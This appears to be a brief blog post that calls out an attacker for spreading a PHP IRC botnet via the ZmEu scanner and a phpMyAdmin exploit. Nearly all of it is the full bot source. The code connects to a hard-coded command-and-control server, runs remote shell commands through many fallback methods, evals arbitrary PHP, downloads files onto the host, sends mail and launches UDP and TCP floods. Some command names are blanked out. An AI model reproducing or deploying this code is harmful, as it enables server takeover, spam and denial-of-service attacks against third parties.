LOL
He uses zmeu scanner and pma exploit to spread a php botnet !
here is bot script
<?php
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class pBot
{
var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; }
if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case " ":
if(true)
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case " ":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case " ":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case " ":
$this->set_nick();
break;
case " ":
$this->send(strstr($msg,$mcmd[1]));
break;
case " ":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = Exe($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case " ":
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]);
}
fclose($this->conn);
}
break;
case " ":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not open output file.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
}
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$this->nick = "";
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
else $this->nick .= "Linux|";
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= "";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= "";
else $this->nick .= "";
}
else
{
$this->nick .= "";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"".$env."".$vel."");
}
function tcpconn($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start();
?>
No comments:
Post a Comment